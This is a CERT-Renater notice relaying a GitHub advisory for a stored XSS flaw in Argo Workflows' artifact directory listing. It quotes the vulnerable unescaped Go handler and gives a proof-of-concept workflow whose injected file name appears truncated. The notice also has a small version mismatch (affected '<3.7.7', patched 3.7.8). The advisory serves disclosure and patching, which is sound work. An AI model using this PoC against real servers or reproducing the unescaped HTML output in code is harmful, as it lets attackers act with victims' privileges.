=====================================================================
CERT-Renater
Note d'Information No. 2026/VULN063
_____________________________________________________________________
DATE : 22/01/2026
HARDWARE PLATFORM(S): /
OPERATING SYSTEM(S): Systems running argo-workflows (Go) versions
prior to 3.6.17 (3.6.x branch) or prior to 3.7.8 (3.7.x branch).
=====================================================================
https://github.com/argoproj/argo-workflows/security/advisories/GHSA-cv78-6m8q-ph82
_____________________________________________________________________
Stored XSS in the artifact directory listing
High
Joibel published GHSA-cv78-6m8q-ph82 Jan 21, 2026
Package
github.com/argoproj/argo-workflows (Go)
Affected versions
<3.6.17
>=3.7.0, <3.7.7
Patched versions
3.6.17
3.7.8
Description
Summary
Stored XSS in the artifact directory listing allows any workflow
author to execute arbitrary JavaScript in another user’s browser under
the Argo Server origin, enabling API actions with the victim’s
privileges.
Details
The directory listing response in server/artifacts/artifact_server.go
renders object names directly into HTML via fmt.Fprintf without
escaping, both as the href attribute and as the link text. Object names
come from driver.ListObjects(...) and are attacker-controlled, because
a workflow step can write files with arbitrary names into an output
artifact directory.
argo-workflows/server/artifacts/artifact_server.go
Lines 194 to 244 in 9872c29
	if isDir {
		// return an html page to the user
		objects, err := driver.ListObjects(ctx, artifact)
		if err != nil {
			a.httpFromError(ctx, err, w)
			return
		}
		a.logger.WithFields(logging.Fields{
			"artifact": artifact,
			"files":    objects,
		}).Debug(ctx, "this is a directory")
		key, _ := artifact.GetKey()
		for _, object := range objects {
			// object is prefixed by the key, we must trim it
			dir, file := path.Split(strings.TrimPrefix(object, key+"/"))
			// if dir is empty string, we are in the root dir
			// we found in index.html, abort and redirect there
			if dir == "" && file == "index.html" {
				w.Header().Set("Location", r.URL.String()+"index.html")
				w.WriteHeader(http.StatusTemporaryRedirect)
				return
			}
		}
		w.WriteHeader(http.StatusOK)
		_, _ = w.Write([]byte("<html><body><ul>\n"))
		dirs := map[string]bool{} // to de-dupe sub-dirs
		// object names are interpolated unescaped into both the href and the link text
		_, _ = fmt.Fprintf(w, "<li><a href=\"%s\">%s</a></li>\n", "..", "..")
		for _, object := range objects {
			// object is prefixed the key, we must trim it
			dir, file := path.Split(strings.TrimPrefix(object, key+"/"))
			// if dir is empty string, we are in the root dir
			if dir == "" {
				_, _ = fmt.Fprintf(w, "<li><a href=\"%s\">%s</a></li>\n", file, file)
			} else if dirs[dir] {
				continue
			} else {
				_, _ = fmt.Fprintf(w, "<li><a href=\"%s\">%s</a></li>\n", dir, dir)
				dirs[dir] = true
			}
		}
		_, _ = w.Write([]byte("</ul></body></html>"))
PoC
Deploy Argo Workflows:
kubectl create ns argo
kubectl apply --server-side -f manifests/base/crds/full
kubectl apply --server-side -k manifests/quick-start/postgres
Port‑forward Argo Server:
kubectl -n argo port-forward deploy/argo-server 2746:2746
Create the PoC workflow:
cat > /tmp/argo-xss.yaml <<'EOF'
apiVersion: argoproj.io/v1alpha1
kind: Workflow
metadata:
  generateName: xss-artifact-test-
spec:
  entrypoint: main
  templates:
    - name: main
      container:
        image: alpine
        command: [sh, -c]
        args:
          - |
            mkdir -p /tmp/artifacts
            touch '/tmp/artifacts/xss">
            .html'
      outputs:
        artifacts:
          - name: dir
            path: /tmp/artifacts
            archive:
              none: {}
EOF
kubectl -n argo create -f /tmp/argo-xss.yaml
Wait for completion:
kubectl -n argo get wf -w
Get the node ID:
kubectl -n argo get wf -o jsonpath='{range .status.nodes.*}{.id}{"\t"}{.displayName}{"\n"}{end}'
Open the listing, substituting the workflow name and the node ID obtained in the previous step:
https://localhost:2746/artifact-files/argo/workflows/<workflow-name>/<node-id>/outputs/dir/
Impact
The attacker creates a workflow whose output artifact directory contains
an HTML file carrying a script that uses XHR calls to interact with the
Argo Server API.
The attacker e-mails the deep link to the artifact to their victim.
The victim opens the link and the script starts running.
Because the script runs under the Argo Server origin, it can call the
Argo Server API as the victim and may do the following (if the
victim's own permissions allow it):
Read information about the victim's workflows.
Create or delete workflows.
Severity
High
7.3 / 10
CVSS v4 base metrics
Exploitability Metrics
Attack Vector Network
Attack Complexity High
Attack Requirements None
Privileges Required Low
User interaction Active
Vulnerable System Impact Metrics
Confidentiality High
Integrity High
Availability High
Subsequent System Impact Metrics
Confidentiality None
Integrity None
Availability None
CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
CVE ID
CVE-2026-23960
Weaknesses
No CWEs
Credits
@Masamuneee Masamuneee Reporter
=========================================================
+ CERT-RENATER | tel : 01-53-94-20-44 +
+ 23/25 Rue Daviel | fax : 01-53-94-20-41 +
+ 75013 Paris | email:cert@support.renater.fr +
=========================================================